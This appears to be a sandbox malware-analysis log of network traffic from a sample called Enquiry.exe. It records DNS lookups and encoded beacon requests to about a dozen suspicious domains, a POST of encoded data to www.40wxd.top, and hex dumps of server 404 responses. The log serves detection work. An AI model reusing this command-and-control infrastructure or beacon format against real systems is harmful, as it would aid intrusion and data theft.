            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /7mju/?oB=mVppHlHxM&3jE8o=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /l8if/?3jE8o=fb3YagVOau/9jH9JrwpuHsbxrllxr9uMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0IvhyZ1jg35IXHzinqtRNXlFD8GamKybSzcUs8=&oB=mVppHlHxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.40wxd.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /iqqs/?oB=mVppHlHxM&3jE8o=f7Pu0FXPylRYdptkWs+23MtWxvoKJz6PgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb4laqx4Tc9G/2Lb24L4CzfFNZpkDBhe90DBs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /za4w/?3jE8o=amKRWiKm4n2uVVmquK3pO4ytbvwAVYfGsSxD6t+zETObSo4UtHmM+luuKDpd7kXCKFMkhSBg5WV5tZxLwwxtS3C6HDmB+/Q82UKvkehAPto6APfZTiOkjF0=&oB=mVppHlHxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.i16zb920d.cfdConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /eruc/?oB=mVppHlHxM&3jE8o=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.o731lh.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ui3j/?3jE8o=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&oB=mVppHlHxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nakama2-sshl.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ak5l/?3jE8o=eH+SO6exUc8kNdkvUVCoynUPLpD0oidFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhJwia7KRoh2N0l2r+oB94KBnVCOyz53vPt1M=&oB=mVppHlHxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zz82x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /b8ih/?3jE8o=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&oB=mVppHlHxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /6wpo/?oB=mVppHlHxM&3jE8o=s9KIkrkzrqTbzkMmh7Bli3B0wEyBHaCwBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAcV+6tVbS2gqGz3F/PYSng2mbFSIjOzq2Kmk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.prj81oqde1.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /p9u3/?3jE8o=D1Jc/C1nh+BZL85ZeChw3l4+cioj8fKXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1Ewp0jkjvaZxrb1x+aTR+tBdOAHUHhfEgGmf4=&oB=mVppHlHxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficDNS traffic detected: DNS query: www.newdaydawning.net
            Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.uburn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.i16zb920d.cfd
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.nakama2-sshl.xyz
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
            Source: global trafficDNS traffic detected: DNS query: www.prj81oqde1.buzz
            Source: global trafficDNS traffic detected: DNS query: www.komart.shop
            Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
            Source: unknownHTTP traffic detected: POST /l8if/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.40wxd.topOrigin: http://www.40wxd.topConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 202Referer: http://www.40wxd.top/l8if/User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Data Raw: 33 6a 45 38 6f 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 65 68 72 35 77 39 31 46 5a 75 6b 70 45 30 31 65 59 72 46 79 50 31 58 56 68 43 51 64 5a 32 50 35 67 3d 3d Data Ascii: 3jE8o=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm3ehr5w91FZukpE01eYrFyP1XVhCQdZ2P5g==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:54:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:54:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:54:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:54:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:54:42 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:54:45 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:54:48 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Sep 2024 12:54:50 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 